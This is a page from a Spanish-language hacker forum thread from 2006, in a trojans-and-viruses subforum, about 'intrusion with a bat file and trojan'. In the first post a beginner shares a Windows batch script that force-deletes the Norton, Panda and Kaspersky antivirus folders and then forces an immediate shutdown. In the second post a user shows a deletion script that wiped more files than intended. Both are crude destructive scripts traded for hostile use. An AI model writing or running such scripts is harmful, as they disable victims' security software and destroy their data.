Nuevas NORMAS para el foro

Curso Hacker
Bienvenido(a), Visitante. Favor de ingresar o registrarse.
¿Perdiste tu email de activación? - Agosto 21, 2008, 02:58:31
Boton Buscar
Inicio Ayuda Ingresar Registrarse
Visita: Articulos - Juegos Gratis - Da Foros

Comunidad Underground Hispana  |  Hack Novato  |  Troyanos y virus (Moderadores: -Erick-, Angelus_7722)  |  Tema: Intrusión con Bat y Troyano Detectable!!! 0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: 1 2 3 4 [5] Ir Abajo Imprimir
Autor Tema: Intrusión con Bat y Troyano Detectable!!!  (Leído 15933 veces)
otoelpiloto
Visitante
« Respuesta #100 en: Febrero 02, 2006, 10:19:57 »

hola soy nuevo en esto y en este foro, y ante todo queria daros las gracias por la paciencia que teneis con los que no sabemos,

yo queria haceros una pregunta para que me digais que estoy haciendo mal, he creado un archivo bat asi:

@echo off
cd\
cd archivos de programa
del /Q/S/F norton antivirus
del /Q/S/F panda titanium
del /Q/S/F kaspersky
shutdown -s -t 1 -f

bueno yo habia creado 3 carpetas en archivos de programa una norton antivirus otra panda titanium y otra kaspersky y las 3 tenian datos dentro, pues ejecute esto y solo se me borro los del kaspersky.

podriais decirme que he hecho mal ?? gracias de antemano
geob234
Habitual
Desconectado Desconectado

Ver Perfil
« Respuesta #101 en: Febrero 05, 2006, 05:57:57 »

pues yo hise uno a partir de pruevas, para eliminar carpetas y archivos, como lo que aparecen en respuestas anteriores; pero al provarlo me empeso a borrar todo lo que tenia ademas de eso lo pude parar,
este es el fuente que utilise:

@echo off
cd\
cd archivos de programa
cd prueba         
del *.* /Q /F /S     
cd.. del prueba     
del prueba           
exit   

se supone que solo me iba a borrar la carpeta prueva,